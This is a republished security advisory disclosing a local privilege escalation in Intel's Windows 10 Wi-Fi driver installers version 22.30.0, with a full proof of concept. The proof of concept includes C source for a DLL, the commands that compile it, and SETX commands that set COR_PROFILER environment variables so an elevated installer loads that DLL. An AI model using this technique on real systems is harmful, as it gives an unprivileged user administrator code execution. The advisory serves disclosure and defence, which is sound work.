Windows 10 Wi-Fi Drivers For Intel Wireless Adapters 22.30.0 Privilege Escalation exploit

3 years ago 230
BOOK THIS SPACE FOR AD
ARTICLE AD

Share

## https://sploitus.com/exploit?id=PACKETSTORM:162324 Hi @ll, the executable installers version 22.30.0 (Latest), published 2/23/2021, for the "Windows® 10 Wi-Fi Drivers for Intel® Wireless Adapters", <https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver32_Win10.exe> and <https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver64_Win10.exe>, available from <https://downloadcenter.intel.com/download/30208/Windows-10-Wi-Fi-Drivers-for-Intel-Wireless-Adapters> are (SURPRISE!) vulnerable: they allow arbitrary code execution WITH local escalation of privilege. CVSS 3.0 score: 8.2 (High) CVSS 3.0 vector: 3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H Demonstration: ~~~~~~~~~~~~~~ 0. Log on with an arbitrary user account. 1. Save the following source as poc.c in an arbitrary directory: --- poc.c --- // Copyright (C) 2004-2021, Stefan Kanthak <stefan.kanthak@nexgo.de> #define STRICT #define UNICODE #define WIN32_LEAN_AND_MEAN #include <windows.h> const STARTUPINFO si = {sizeof(si)}; __declspec(safebuffers) BOOL WINAPI _DllMainCRTStartup(HANDLE hModule, DWORD dwReason, CONTEXT *lpContext) { WCHAR szCmdLine[] = L"CMD.exe /D /K WHOAMI.exe /ALL"; PROCESS_INFORMATION pi; #if 0 if (dwReason != DLL_PROCESS_ATTACH) return FALSE; #endif if (CreateProcess(NULL, szCmdLine, NULL, NULL, FALSE, CREATE_DEFAULT_ERROR_MODE | CREATE_NEW_CONSOLE | CREATE_NEW_PROCESS_GROUP | CREATE_UNICODE_ENVIRONMENT, NULL, NULL, &si, &pi)) { CloseHandle(pi.hThread); CloseHandle(pi.hProcess); } return TRUE; } --- EOF --- 2. Start the command prompt of the 32-bit Windows Software Development Kit, then run the following command lines to compile poc.c and link it as poc.dll: CL.exe /Zl /W4 /Ox /GAFy /c poc.c LINK.exe /LINK /DLL /DYNAMICBASE /ENTRY:_DllMainCRTStartup /NODEFAULTLIB /NXCOMPAT /OPT:REF /RELEASE /SUBSYSTEM:Windows poc.obj kernel32.lib ALTERNATIVE for steps 1 and 2: 2. Download <https://skanthak.homepage.t-online.de/download/SENTINEL.DLL> and save it as poc.dll in an arbitrary directory. See <https://skanthak.homepage.t-online.de/sentinel.html> for its documentation, and <https://insights.sei.cmu.edu/cert/2016/06/bypassing-application-whitelisting.html> for an example how to use it. 3. Logon with the user account created during Windows setup. 4. Download <https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver32_Win10.exe> and <https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver64_Win10.exe> and save them in an arbitrary directory. 5. Start a command prompt (UNELEVATED!) and run the following command lines (replace <directory> with the pathname of the directory where you built or saved poc.dll): SETX.exe COR_ENABLE_PROFILING 1 SETX.exe COR_PROFILER {32E2F4DA-1BEA-47EA-88F9-C5DAF691C94A} SETX.exe COR_PROFILER_PATH <directory>\poc.dll JFTR: this is just one method to set these environment variables without the need to elevate! 6. Execute WiFi_22.30.0_Driver32_Win10.exe and WiFi_22.30.0_Driver64_Win10.exe per double-click, acknowledge the UAC prompt, then admire the console windows showing the output of WHOAMI.exe running elevated. stay tuned, and far away from Intel's vulnerable crap! Stefan Kanthak
Read Entire Article